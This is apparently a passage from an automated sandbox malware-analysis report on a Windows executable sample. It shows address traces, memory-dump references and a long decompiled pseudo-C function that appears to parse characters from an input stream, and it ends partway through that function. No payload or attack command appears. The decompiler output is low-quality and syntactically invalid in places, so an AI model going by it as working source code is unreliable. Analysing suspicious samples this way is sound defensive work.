0x01401851
0x01401854
0x01401856
0x00000000
0x00000000
0x014014dc
0x014014dc
0x014014e0
0x00000000
0x014014e0
0x0140183a
0x014014ce
0x014014d1
0x014014d4
0x014014d6
0x00000000
0x00000000
0x00000000
0x014014d6
0x014014ba
0x0140109e
0x014010a1
0x014010a4
0x014010a6
0x00000000
0x00000000
0x00000000
0x00000000
0x01400e20
0x01400e24
0x01400e29
0x01400e30
0x01400e32
0x01400e34
0x01401308
0x0140130b
0x0140130e
0x014018c7
0x014018cf
0x014018d2
0x014018d7
0x01401314
0x01401314
0x01401314
0x01400e3a
0x01400e3a
0x01400e3a
0x01400e3c
0x01400e43
0x01400e4b
0x01400e4d
0x01400e50
0x00000000
0x00000000
0x01400e56
0x01400e5a
0x01401280
0x01401283
0x01401287
0x01401289
0x014010b6
0x014010b6
0x014010ba
0x014010bd
0x014010c0
0x00000000
0x00000000
0x00000000
0x014010c0
0x0140128f
0x0140128f
0x01401293
0x01401293
0x01401293
0x01401297
0x01401297
0x0140129a
0x0140129d
0x014012a2
0x014012a2
0x014012a5
0x014012a7
0x014017a0
0x014017a0
0x014017a4
0x014017a7
0x014017aa
0x014017b9
0x014017be
0x014017c1
0x014017c4
0x014017c9
0x014017c9
0x014017aa
0x014012ad
0x014012b0
0x014012b4
0x014012b7
0x014012b9
0x014012bb
0x014012bd
0x014019b0
0x014019b3
0x014019b8
0x014019bb
0x014019c5
0x014019c8
0x014019cb
0x014019cb
0x014019bb
0x014012bd
0x014012c3
0x014012c6
0x014012c8
0x014012cb
0x014012cb
0x014012cb
0x014012ce
0x014012d4
0x014012d6
0x014012d8
0x014012db
0x014012db
0x014012e0
0x014012e6
0x014012e8
0x014012ea
0x014012ed
0x014012ed
0x014012fe
0x014012fe
0x01400e60
0x01400e62
0x01401320
0x01401323
0x01401326
0x014018e4
0x014018e7
0x014018ef
0x014018f7
0x0140132c
0x0140132c
0x0140132c
0x01400e6e
0x01400e6e
0x01400e6e
0x01400e74
0x01400e7f
0x01400e86
0x01400e89
0x01400e90
0x01400dc3
0x01400dc9
0x01400dd5
0x01400dd5
0x01400dd8
0x01400ddb
0x01400de0
0x01401370
0x01400de6
0x01400de6
0x01400de6
0x01400deb
0x014011e0
0x014011eb
0x014011f3
0x014011fb
0x014011fe
0x01401203
0x01401206
0x01401206
0x01400df5
0x01400df9
0x01400dff
0x01400e02
0x01400e07
0x01400e07
0x01400e0d
0x01400f1d
0x01400f21
0x01400e19
0x01400e19
0x01400e24
0x01400e29
0x01400e30
0x01400e32
0x01400e34
0x01401308
0x0140130b
0x0140130e
0x014018c7
0x014018cf
0x014018d2
0x014018d7
0x01401314
0x01401314
0x01401314
0x01400e3a
0x01400e3a
0x01400e3a
0x01400e3c
0x01400e43
0x01400e4b
0x01400e4d
0x01400e50
0x00000000
0x00000000
0x01400e50
0x01400e13
0x01400e13
0x01400e16
0x00000000
0x01400e16
0x01400e96
0x01400e9e
0x01401210
0x01401214
0x01401380
0x01401384
0x01401387
0x0140138a
0x0140138c
0x00000000
0x00000000
0x00000000
0x01401392
0x0140121d
0x0140121f
0x00000000
0x01401221
0x01401224
0x01401228
0x0140122f
0x00000000
0x0140122f
0x0140121f
0x01400ea4
0x01400ea7
0x01400eab
0x01400eb0
0x00000000
0x00000000
0x01400ebb
0x00000000
0x00000000
0x01400ec5
0x00000000
0x00000000
0x01400ecb
0x01400ed0
0x01401a3b
0x00000000
0x01401a3b
0x01400ed6
0x01400ed9
0x01400edf
0x01400ee2
0x01400ee2
0x01400ee7
0x014013a0
0x01400eed
0x01400eed
0x01400eed
0x01400ef2
0x01401338
0x01401343
0x0140134b
0x01401353
0x01401356
0x0140135b
0x0140135e
0x0140135e
0x01400efc
0x01400f03
0x01400f09
0x01400f0c
0x01400f11
0x01400f17
0x00000000
0x00000000
0x00000000
0x00000000
0x01401240
0x01401240
0x01401243
0x01401248
0x0140124b
0x00000000
0x00000000
0x0140125a
0x01401264
0x0140126c
0x01401270
0x01401273
0x01401275
0x00000000
0x00000000
0x00000000
0x00000000
0x01401275
0x00000000
0x01400db3
0x014017f6
0x014017f6
0x00000000
0x014010c2
0x014010c2
0x014010c2
0x014010cc
0x014010cc
0x014010d6
0x00000000

Strings

-, xrefs: 014016BE

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 19bc832825b962e9e9e9a920c79b33213ac1a2ef66e66066a225593ad3e35fe6
Instruction ID: 7139dc661457e49dd0bf831b7c4069ce7f2a57cb21f1d7494398522a431c029f
Opcode Fuzzy Hash: 19bc832825b962e9e9e9a920c79b33213ac1a2ef66e66066a225593ad3e35fe6
Instruction Fuzzy Hash: E1A29E71A042558FDF12CF6AC4847ADBBF2AF45760F18866AE855AB3E2D730DC46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013FFB70 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E013FFB70(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed char _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, intOrPtr* _a28) {
				void* _v16;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed char _v77;
				char _v78;
				char _v80;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v126;
				signed int _v127;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _t554;
				signed char _t560;
				signed int _t561;
				intOrPtr* _t562;
				signed int _t570;
				signed int _t571;
				signed int _t576;
				signed int _t578;
				signed int _t579;
				signed int _t581;
				signed int _t678;
				void* _t717;
				signed int _t737;
				signed int _t750;
				void* _t762;
				void* _t763;
				intOrPtr* _t764;
				signed int* _t766;

				_t717 = __edx;
				_t764 = _t763 - 0x9c;
				_t678 = _a4;
				_v104 = _a16;
				_v96 = _a8;
				_v100 = _a12;
				_t554 = _a20 + 0x6c;
				_v108 = _t554;
				_v172 = _t554;
				_v140 = E01474F00(__eflags);
				_t750 = E013F0230(0x14a47e8);
				_t560 =  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0x6c)) + 0xc)) + _t750 * 4;
				_v116 = _t560;
				_t561 =  *_t560;
				_v112 = _t561;
				if(_t561 == 0) {
					_t562 = E01477960(0x44);
					 *(_t562 + 4) = 0;
					_t737 = _t562;
					 *_t562 = 0x14b1d94;
					 *(_t562 + 8) = 0;
					 *(_t562 + 0xc) = 0;
					 *((char*)(_t562 + 0x10)) = 0;
					 *(_t737 + 0x14) = 0;
					 *((short*)(_t737 + 0x11)) =  *0x14a8a04 & 0x0000ffff;
					 *(_t737 + 0x18) = 0;
					 *(_t737 + 0x1c) = 0;
					 *(_t737 + 0x20) = 0;
					 *(_t737 + 0x24) = 0;
					 *(_t737 + 0x28) = 0;
					 *(_t737 + 0x2c) = 0;
					 *(_t737 + 0x30) = 0;
					 *(_t737 + 0x34) = 0;
					 *((char*)(_t737 + 0x43)) = 0;
					_v172 = _v108;
					E0145B9E0(_t737, __eflags);
					_v172 = _t750;
					_v176 = _t737;
					E0145F340( *((intOrPtr*)(_a20 + 0x6c)));
					_t764 = _t764 - 0xfffffffffffffffc;
					_v112 =  *_v116;
				}
				_t570 = _v112;
				_v132 = _t570 + 0x38;
				if( *(_t570 + 0x20) != 0) {
					_t571 = _v112;
					__eflags =  *(_t571 + 0x28);
					_v127 =  *(_t571 + 0x28) != 0;
				} else {
					_v127 = 0;
				}
				_v72 = 0;
				_v76 =  &_v68;
				_v68 = 0;
				if( *((char*)(_v112 + 0x10)) != 0) {
					 *_t764 = 0x20;
					E01464B20( &_v76, _t717);
					_t764 = _t764 - 4;
				}
				_v48 = 0;
				_v52 =  &_v44;
				_v44 = 0;
				 *_t764 = 0x20;
				E01464B20( &_v52, _t717);
				_t576 = _v112;
				_v125 = 0;
				_t766 = _t764 - 4;
				_v108 = 0;
				_v116 = 0;
				_v124 = _t576 + 0x39;
				_v80 =  *((intOrPtr*)(_t576 + 0x34));
				_v148 = 0;
				_v136 = 0;
				_v126 = 0;
				goto L6;
				do {
					while(1) {
						L6:
						_t578 = _v108;
						if( *(_t762 + _t578 - 0x4c) > 4) {
							break;
						}
						switch( *((intOrPtr*)(( *(_t762 + _t578 - 0x4c) & 0x000000ff) * 4 +  &M014A8804))) {
							case 0:
								_v120 = 1;
								goto L34;
							case 1:
								__eflags = _v96 - 0xffffffff;
								__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
								__eflags = __ebx;
								__edi = __eax;
								__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
								__ecx = __edi;
								__al = __al & __cl;
								__eflags = __al;
								__esi = __eax;
								if(__al != 0) {
									__eax =  *(__ebx + 0xc);
									__eflags =  *(__ebx + 8) - __eax;
									if( *(__ebx + 8) >= __eax) {
										__eax =  *__ebx;
										__ecx = __ebx;
										__eax =  *((intOrPtr*)( *__ebx + 0x24))();
										__eflags =  *__ebx - 0xffffffff;
										__eax = 0;
										__esi =  !=  ? 0 : __esi;
										__eax = 0;
										__ebx =  ==  ? 0 : __ebx;
									} else {
										__esi = 0;
									}
								} else {
									__esi = __edi;
								}
								__edx = _v100;
								__eflags = _v104 - 0xffffffff;
								__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
								__eflags = __edx;
								__edx = __edx & 0xffffff00 | __edx != 0x00000000;
								__dl = __dl & __al;
								__eflags = __dl;
								_v120 = __dl;
								if(__dl != 0) {
									__edx = _v100;
									__eax = 0;
									__ecx =  *(__edx + 0xc);
									__eflags =  *((intOrPtr*)(__edx + 8)) -  *(__edx + 0xc);
									if( *((intOrPtr*)(__edx + 8)) >=  *(__edx + 0xc)) {
										__eax =  *__edx;
										__ecx = __edx;
										__eax =  *((intOrPtr*)( *__edx + 0x24))();
										__edx = _v120 & 0x000000ff;
										__eflags = __eax - 0xffffffff;
										__eax = 0;
										__eax =  ==  ? _v120 & 0x000000ff : 0;
										__edx = 0;
										__edx =  !=  ? _v100 : 0;
										_v100 = 0;
									}
								}
								__ecx = __esi;
								_v120 = 0;
								__eflags = __cl - __al;
								if(__cl == __al) {
									L34:
									__eflags = _v108 - 3;
									if(_v108 != 3) {
										while(1) {
											__eflags = _v96 - 0xffffffff;
											__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
											__eflags = __ebx;
											__edi = __eax;
											__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
											__ecx = __edi;
											__al = __al & __cl;
											__eflags = __al;
											__esi = __eax;
											if(__al == 0) {
												__esi = __edi;
											} else {
												__eax =  *(__ebx + 0xc);
												__eflags =  *(__ebx + 8) - __eax;
												if( *(__ebx + 8) >= __eax) {
													__eax =  *__ebx;
													__ecx = __ebx;
													__eax =  *((intOrPtr*)( *__ebx + 0x24))();
													__eflags =  *__ebx - 0xffffffff;
													__eax = 0;
													__esi =  !=  ? 0 : __esi;
													__eax = 0;
													__ebx =  ==  ? 0 : __ebx;
												} else {
													__esi = 0;
												}
											}
											L53:
											__ecx = _v100;
											__eflags = _v104 - 0xffffffff;
											__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
											__eflags = _v100;
											__edx = __edx & 0xffffff00 | _v100 != 0x00000000;
											__dl = __dl & __al;
											__eflags = __dl;
											_v144 = __dl;
											if(__dl != 0) {
												__edx = _v100;
												__eax = 0;
												__ecx =  *(__edx + 0xc);
												__eflags =  *((intOrPtr*)(__edx + 8)) -  *(__edx + 0xc);
												if( *((intOrPtr*)(__edx + 8)) >=  *(__edx + 0xc)) {
													__eax =  *__edx;
													__ecx = __edx;
													__eax =  *((intOrPtr*)( *__edx + 0x24))();
													__edx = _v144 & 0x000000ff;
													__eflags = __eax - 0xffffffff;
													__eax = 0;
													__eax =  ==  ? _v144 & 0x000000ff : 0;
													__edx = 0;
													__edx =  !=  ? _v100 : 0;
													_v100 = 0;
												}
											}
											__ecx = __esi;
											__eflags = __al - __cl;
											if(__al == __cl) {
												goto L68;
											} else {
												__eflags = __ebx;
												if(__ebx == 0) {
													L57:
													__eax = _v96;
													L58:
													__esi = _v140;
													__eax = __al & 0x000000ff;
													__edx =  *(__esi + 0x18);
													__eflags =  *(__edx + __eax * 2) & 0x00000020;
													if(( *(__edx + __eax * 2) & 0x00000020) == 0) {
														goto L68;
													}
													__eax =  *(__ebx + 8);
													__eflags = __eax -  *(__ebx + 0xc);
													if(__eax >=  *(__ebx + 0xc)) {
														__eax =  *__ebx;
														__ecx = __ebx;
														__eax =  *((intOrPtr*)( *__ebx + 0x28))();
														L61:
														_v96 = 0xffffffff;
														__eflags = _v96 - 0xffffffff;
														__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
														__eflags = __ebx;
														__edi = __eax;
														__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
														__ecx = __edi;
														__al = __al & __cl;
														__eflags = __al;
														__esi = __eax;
														if(__al == 0) {
															__esi = __edi;
														} else {
															__eax =  *(__ebx + 0xc);
															__eflags =  *(__ebx + 8) - __eax;
															if( *(__ebx + 8) >= __eax) {
																__eax =  *__ebx;
																__ecx = __ebx;
																__eax =  *((intOrPtr*)( *__ebx + 0x24))();
																__eflags =  *__ebx - 0xffffffff;
																__eax = 0;
																__esi =  !=  ? 0 : __esi;
																__eax = 0;
																__ebx =  ==  ? 0 : __ebx;
															} else {
																__esi = 0;
															}
														}
														goto L53;
													}
													L60:
													__eax = __eax + 1;
													__eflags = __eax;
													 *(__ebx + 8) = __eax;
													goto L61;
												}
												__eax = __edi;
												__eflags = __al;
												if(__al != 0) {
													__eax =  *(__ebx + 8);
													__eflags = __eax -  *(__ebx + 0xc);
													if(__eax >=  *(__ebx + 0xc)) {
														__eax =  *__ebx;
														__ecx = __ebx;
														__eax =  *((intOrPtr*)( *__ebx + 0x24))();
														__edx = 0;
														__eflags =  *__ebx - 0xffffffff;
														__ebx =  ==  ? 0 : __ebx;
														goto L58;
													}
													__edi = _v140;
													__ecx =  *__eax & 0x000000ff;
													__edx =  *(__edi + 0x18);
													__eflags =  *(__edx + __ecx * 2) & 0x00000020;
													if(( *(__edx + __ecx * 2) & 0x00000020) != 0) {
														goto L60;
													}
													_v96 = 0xffffffff;
													goto L68;
												}
												goto L57;
											}
										}
									} else {
										__eflags = _v136 - 1;
										__eax = __eax & 0xffffff00 | _v136 - 0x00000001 > 0x00000000;
										__eflags = __al;
										L36:
										__eflags = _t581;
										if(_t581 == 0) {
											__eflags = _v120;
											if(_v120 == 0) {
												goto L99;
											}
											__eflags = _v48 - 1;
											if(_v48 <= 1) {
												L173:
												__eflags = _v126;
												if(_v126 != 0) {
													__eflags =  *_v52 - 0x30;
													if( *_v52 != 0x30) {
														_v168 = 0x2d;
														_v172 = 1;
														_v176 = 0;
														 *_t766 = 0;
														E01462FD0(_t678,  &_v52, _t739, _t751, _t762);
														_t766 = _t766 - 0x10;
													}
												}
												_t744 = _v72;
												__eflags = _t744;
												if(_t744 != 0) {
													__eflags = _v125;
													_t601 =  ==  ? _v116 & 0x000000ff : _v148 & 0x000000ff;
													_t385 = _t744 + 1; // 0x1
													_t755 = _t385;
													_v108 =  ==  ? _v116 & 0x000000ff : _v148 & 0x000000ff;
													_t602 = _v76;
													__eflags = _t602 -  &_v68;
													if(_t602 ==  &_v68) {
														_t719 = 0xf;
													} else {
														_t719 = _v68;
													}
													__eflags = _t719 - _t755;
													if(_t719 < _t755) {
														_v168 = 1;
														_v172 = 0;
														_v176 = 0;
														 *_t766 = _t744;
														E01464F90( &_v76);
														_t602 = _v76;
														_t766 = _t766 - 0x10;
													}
													 *((char*)(_t602 + _t744)) = _v108 & 0x000000ff;
													_v72 = _t755;
													 *((char*)(_v76 + _t744 + 1)) = 0;
													_v172 =  &_v76;
													_t746 = _v112;
													_v176 =  *((intOrPtr*)(_t746 + 0xc));
													 *_t766 =  *(_t746 + 8);
													_t608 = E01473040();
													__eflags = _t608;
													if(_t608 == 0) {
														_t609 = _a24;
														 *_t609 =  *_t609 | 0x00000004;
														__eflags =  *_t609;
													}
												}
												__eflags = _v96 - 0xffffffff;
												_v108 = _v96 == 0xffffffff;
												__eflags = _v125;
												if(_v125 == 0) {
													L184:
													 *_t766 =  &_v52;
													_t597 = E014631F0(_a28);
													_t766 = _t766 - 4;
													__eflags = _t678;
													_t584 = (_t597 & 0xffffff00 | _t678 != 0x00000000) & _v108;
													__eflags = _t584;
													_t752 = _t584;
													if(_t584 == 0) {
														goto L101;
													}
													goto L186;
												} else {
													_t599 = _v112;
													__eflags =  *((intOrPtr*)(_t599 + 0x2c)) - _v116;
													if( *((intOrPtr*)(_t599 + 0x2c)) != _v116) {
														goto L100;
													}
													goto L184;
												}
											}
											L198:
											_v176 = 0;
											 *_t766 = 0x30;
											_t612 = E013F3450( &_v52);
											_t766 = _t766 - 8;
											__eflags = _t612;
											if(_t612 == 0) {
												goto L173;
											}
											_t721 = _v48;
											__eflags = _t612 - 0xffffffff;
											if(_t612 == 0xffffffff) {
												_t517 = _t721 - 1; // 0x0
												_t612 = _t517;
												__eflags = _t721;
												if(_t721 == 0) {
													 *_v52 = 0;
													goto L173;
												}
												__eflags = _t612;
												if(_t612 == 0) {
													goto L173;
												}
											}
											__eflags = _t612 - _t721;
											 *_t766 = 0;
											_t614 =  >  ? _t721 : _t612;
											_v176 =  >  ? _t721 : _t612;
											E01464D20( &_v52);
											_t766 = _t766 - 8;
											goto L173;
										}
										__eflags = _v126;
										_t616 = _v112;
										if(_v126 != 0) {
											_t617 =  *(_t616 + 0x24);
											_v120 = _t617;
										} else {
											_t617 =  *(_t616 + 0x1c);
											_v120 = _t617;
										}
										_t739 = 1;
										while(1) {
											__eflags = _v96 - 0xffffffff;
											_v108 = _v96 == 0xffffffff;
											__eflags = _t678;
											_t619 = (_t617 & 0xffffff00 | _t678 != 0x00000000) & _v108 & 0x000000ff;
											__eflags = _t619;
											_t756 = _t619;
											if(_t619 != 0) {
												_t620 =  *(_t678 + 0xc);
												__eflags =  *(_t678 + 8) - _t620;
												if( *(_t678 + 8) >= _t620) {
													__eflags =  *((intOrPtr*)( *_t678 + 0x24))() - 0xffffffff;
													_t751 =  !=  ? 0 : _t756;
													_t620 = 0;
													_t678 =  ==  ? 0 : _t678;
												} else {
													_t751 = 0;
												}
											} else {
												_t751 = _v108 & 0x000000ff;
											}
											_t722 = _v100;
											__eflags = _v104 - 0xffffffff;
											_t624 = _t620 & 0xffffff00 | _v104 == 0xffffffff;
											__eflags = _t722;
											if(_t722 == 0) {
												goto L44;
											}
											__eflags = _t624;
											if(_t624 != 0) {
												_t634 = _v100;
												_t722 =  *(_t634 + 0xc);
												__eflags =  *((intOrPtr*)(_t634 + 8)) - _t722;
												if( *((intOrPtr*)(_t634 + 8)) >= _t722) {
													_t636 =  *((intOrPtr*)( *_t634 + 0x24))();
													__eflags = _t636 - 0xffffffff;
													_t722 = _t634 & 0xffffff00 | _t636 == 0xffffffff;
													_t751 = _t751 ^ _t722;
													__eflags = _t636 - 0xffffffff;
													_t638 =  !=  ? _v100 : 0;
													_v100 =  !=  ? _v100 : 0;
												}
												L45:
												__eflags = _t739 - _v136;
												if(_t739 >= _v136) {
													L171:
													__eflags = _t739 - _v136;
													if(_t739 != _v136) {
														goto L100;
													}
													__eflags = _v48 - 1;
													if(_v48 > 1) {
														goto L198;
													}
													goto L173;
												}
												__eflags = _t751;
												if(_t751 == 0) {
													goto L171;
												}
												__eflags = _t678;
												_t696 = _v96;
												_t724 = (_t722 & 0xffffff00 | _t678 != 0x00000000) & _v108;
												__eflags = _t724;
												if(_t724 != 0) {
													_t628 =  *(_t678 + 8);
													__eflags = _t628 -  *(_t678 + 0xc);
													if(_t628 >=  *(_t678 + 0xc)) {
														_t696 =  *((intOrPtr*)( *_t678 + 0x24))();
														__eflags = _t696 - 0xffffffff;
														_t678 =  ==  ? 0 : _t678;
														goto L48;
													}
													_t757 = _v120;
													__eflags =  *_t628 - ( *(_t757 + _t739) & 0x000000ff);
													if( *_t628 == ( *(_t757 + _t739) & 0x000000ff)) {
														L50:
														_t617 = _t628 + 1;
														__eflags = _t617;
														 *(_t678 + 8) = _t617;
														L51:
														_v96 = 0xffffffff;
														_t739 = _t739 + 1;
														continue;
													}
													_v108 = _t724;
													goto L100;
												}
												L48:
												_t632 = _v120;
												__eflags =  *((intOrPtr*)(_t632 + _t739)) - _t696;
												if( *((intOrPtr*)(_t632 + _t739)) != _t696) {
													goto L100;
												}
												_t628 =  *(_t678 + 8);
												__eflags = _t628 -  *(_t678 + 0xc);
												if(_t628 >=  *(_t678 + 0xc)) {
													_t617 =  *((intOrPtr*)( *_t678 + 0x28))();
													goto L51;
												}
												goto L50;
											}
											L44:
											_t751 = _t751 ^ _t624;
											__eflags = _t751;
											goto L45;
										}
									}
								} else {
									__eflags = __ebx;
									if(__ebx == 0) {
										L77:
										__eax = _v96;
										L78:
										__edi = _v140;
										__eax = __al & 0x000000ff;
										_v120 = 0;
										__edx =  *(__edi + 0x18);
										__eflags =  *(__edx + __eax * 2) & 0x00000020;
										if(( *(__edx + __eax * 2) & 0x00000020) == 0) {
											goto L34;
										}
										__eax =  *(__ebx + 8);
										__eflags = __eax -  *(__ebx + 0xc);
										if(__eax >=  *(__ebx + 0xc)) {
											__eax =  *__ebx;
											__ecx = __ebx;
											__eax =  *((intOrPtr*)( *__ebx + 0x28))();
											L81:
											_v96 = 0xffffffff;
											_v120 = 1;
											goto L34;
										}
										L80:
										__eax = __eax + 1;
										__eflags = __eax;
										 *(__ebx + 8) = __eax;
										goto L81;
									}
									__eax = __edi;
									__eflags = __al;
									if(__al != 0) {
										__eax =  *(__ebx + 8);
										__eflags = __eax -  *(__ebx + 0xc);
										if(__eax >=  *(__ebx + 0xc)) {
											__eax =  *__ebx;
											__ecx = __ebx;
											__eax =  *((intOrPtr*)( *__ebx + 0x24))();
											__edx = 0;
											__eflags =  *__ebx - 0xffffffff;
											__ebx =  ==  ? 0 : __ebx;
											goto L78;
										}
										__esi = _v140;
										__ecx =  *__eax & 0x000000ff;
										__edx =  *(__esi + 0x18);
										__eflags =  *(__edx + __ecx * 2) & 0x00000020;
										if(( *(__edx + __ecx * 2) & 0x00000020) != 0) {
											goto L80;
										}
										_v96 = 0xffffffff;
										goto L34;
									}
									goto L77;
								}
							case 2:
								__eax = _a20;
								__eflags =  *(__eax + 0xd) & 0x00000002;
								if(( *(__eax + 0xd) & 0x00000002) != 0) {
									L140:
									__eax = _v112;
									__edi = 0;
									__eflags = 0;
									__eax =  *(_v112 + 0x18);
									_v144 = __eax;
									while(1) {
										__eflags = _v96 - 0xffffffff;
										_v120 = _v96 == 0xffffffff;
										__eflags = __ebx;
										__ecx = _v120 & 0x000000ff;
										__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
										__al = __al & __cl;
										__eflags = __al;
										__esi = __eax;
										if(__al != 0) {
											__eax =  *(__ebx + 0xc);
											__eflags =  *(__ebx + 8) - __eax;
											if( *(__ebx + 8) >= __eax) {
												__eax =  *__ebx;
												__ecx = __ebx;
												__eax =  *((intOrPtr*)( *__ebx + 0x24))();
												__eflags =  *__ebx - 0xffffffff;
												__eax = 0;
												__esi =  !=  ? 0 : __esi;
												__eax = 0;
												__ebx =  ==  ? 0 : __ebx;
											} else {
												__esi = 0;
											}
										} else {
											__esi = _v120 & 0x000000ff;
										}
										__edx = _v100;
										__eflags = _v104 - 0xffffffff;
										__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
										__eflags = __edx;
										if(__edx == 0) {
											goto L145;
										}
										L144:
										__eflags = __al;
										if(__al != 0) {
											__eax = _v100;
											__edx =  *(__eax + 0xc);
											__eflags =  *((intOrPtr*)(__eax + 8)) - __edx;
											if( *((intOrPtr*)(__eax + 8)) >= __edx) {
												__edx = __eax;
												__eax =  *__eax;
												__ecx = __edx;
												__eax =  *((intOrPtr*)(__eax + 0x24))();
												__eflags = __eax - 0xffffffff;
												__edx = __edx & 0xffffff00 | __eax == 0xffffffff;
												__esi = __esi ^ __edx;
												__eflags = __eax - 0xffffffff;
												0 =  !=  ? _v100 : 0;
												_v100 =  !=  ? _v100 : 0;
											}
											L146:
											__eax = _v144;
											__eflags = __edi - _v144;
											if(__edi >= _v144) {
												L189:
												__eax = _v144;
												__eflags = __edi - __eax;
												if(__edi != __eax) {
													L167:
													__eflags = __edi;
													if(__edi != 0) {
														goto L99;
													}
													__eax = _a20;
													__eax =  *(_a20 + 0xc);
													_v120 = __eax;
													__eax = __eax >> 9;
													__eax = __eax ^ 0x00000001;
													__eax = __eax & 0x00000001;
													_v120 = __al;
													goto L68;
												}
												goto L190;
											}
											__eax = __esi;
											__eflags = __al;
											if(__al == 0) {
												goto L189;
											}
											__eflags = __ebx;
											if(__ebx == 0) {
												L150:
												__eax = _v96;
												L151:
												__esi = _v112;
												__edx =  *(__esi + 0x14);
												__eflags =  *(__edx + __edi) - __al;
												if( *(__edx + __edi) != __al) {
													goto L167;
												}
												__eax =  *(__ebx + 8);
												__eflags = __eax -  *(__ebx + 0xc);
												if(__eax >=  *(__ebx + 0xc)) {
													__eax =  *__ebx;
													__ecx = __ebx;
													__eax =  *((intOrPtr*)( *__ebx + 0x28))();
													L154:
													_v96 = 0xffffffff;
													__edi = __edi + 1;
													__eflags = _v96 - 0xffffffff;
													_v120 = _v96 == 0xffffffff;
													__eflags = __ebx;
													__ecx = _v120 & 0x000000ff;
													__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
													__al = __al & __cl;
													__eflags = __al;
													__esi = __eax;
													if(__al != 0) {
														__eax =  *(__ebx + 0xc);
														__eflags =  *(__ebx + 8) - __eax;
														if( *(__ebx + 8) >= __eax) {
															__eax =  *__ebx;
															__ecx = __ebx;
															__eax =  *((intOrPtr*)( *__ebx + 0x24))();
															__eflags =  *__ebx - 0xffffffff;
															__eax = 0;
															__esi =  !=  ? 0 : __esi;
															__eax = 0;
															__ebx =  ==  ? 0 : __ebx;
														} else {
															__esi = 0;
														}
													} else {
														__esi = _v120 & 0x000000ff;
													}
													__edx = _v100;
													__eflags = _v104 - 0xffffffff;
													__eax = __eax & 0xffffff00 | _v104 == 0xffffffff;
													__eflags = __edx;
													if(__edx == 0) {
														goto L145;
													}
												}
												L153:
												__eax = __eax + 1;
												__eflags = __eax;
												 *(__ebx + 8) = __eax;
												goto L154;
											}
											__eflags = _v120;
											if(_v120 != 0) {
												__eax =  *(__ebx + 8);
												__eflags = __eax -  *(__ebx + 0xc);
												if(__eax >=  *(__ebx + 0xc)) {
													__eax =  *__ebx;
													__ecx = __ebx;
													__eax =  *((intOrPtr*)( *__ebx + 0x24))();
													__edx = 0;
													__eflags =  *__ebx - 0xffffffff;
													__ebx =  ==  ? 0 : __ebx;
													goto L151;
												}
												__esi = _v112;
												__edx =  *(__esi + 0x14);
												__ecx =  *(__edx + __edi) & 0x000000ff;
												__eflags =  *__eax - __cl;
												if( *__eax == __cl) {
													goto L153;
												}
												goto L167;
											}
											goto L150;
										}
										L145:
										__esi = __esi ^ __eax;
										__eflags = __esi;
										goto L146;
									}
								}
								__eflags = _v136 - 1;
								if(_v136 > 1) {
									goto L140;
								}
								__eax = _v108;
								__eflags = __eax;
								if(__eax == 0) {
									goto L140;
								}
								__eflags = __eax - 1;
								if(__eax == 1) {
									__eflags = _v127;
									if(_v127 != 0) {
										goto L140;
									}
									__eflags = _v80 - 3;
									if(_v80 == 3) {
										goto L140;
									}
									__eflags = _v78 - 1;
									if(_v78 != 1) {
										L90:
										_v108 = _v108 + 1;
										goto L6;
									}
									goto L140;
								}
								__eflags = _v108 - 2;
								_v120 = 1;
								if(_v108 != 2) {
									goto L68;
								}
								__eax = _v77 & 0x000000ff;
								__eflags = __al - 4;
								if(__al == 4) {
									goto L140;
								}
								__eflags = __al - 3;
								if(__al != 3) {
									goto L90;
								}
								__eflags = _v127;
								if(_v127 != 0) {
									goto L140;
								}
								goto L90;
							case 3:
								__eax = _v112;
								__ecx =  *(__eax + 0x20);
								__eflags = __ecx;
								if(__ecx != 0) {
									__eflags = _v96 - 0xffffffff;
									__eax = __eax & 0xffffff00 | _v96 == 0xffffffff;
									__eflags = __ebx;
									__edi = __eax;
									__eax = __eax & 0xffffff00 | __ebx != 0x00000000;
									__ecx = __edi;
									__al = __al & __cl;
									__eflags = __al;
									__esi = __eax;
									if(__al != 0) {
										__eax =  *(__ebx + 0xc);
										__eflags =  *(__ebx + 8) - __eax;
										if( *(__ebx + 8) >= __eax) {
											__eax =  *__ebx;
											__ecx = __ebx;
											__eax =  *((intOrPtr*)( *__ebx + 0x24))();
											__eflags =  *__ebx - 0xffffffff;
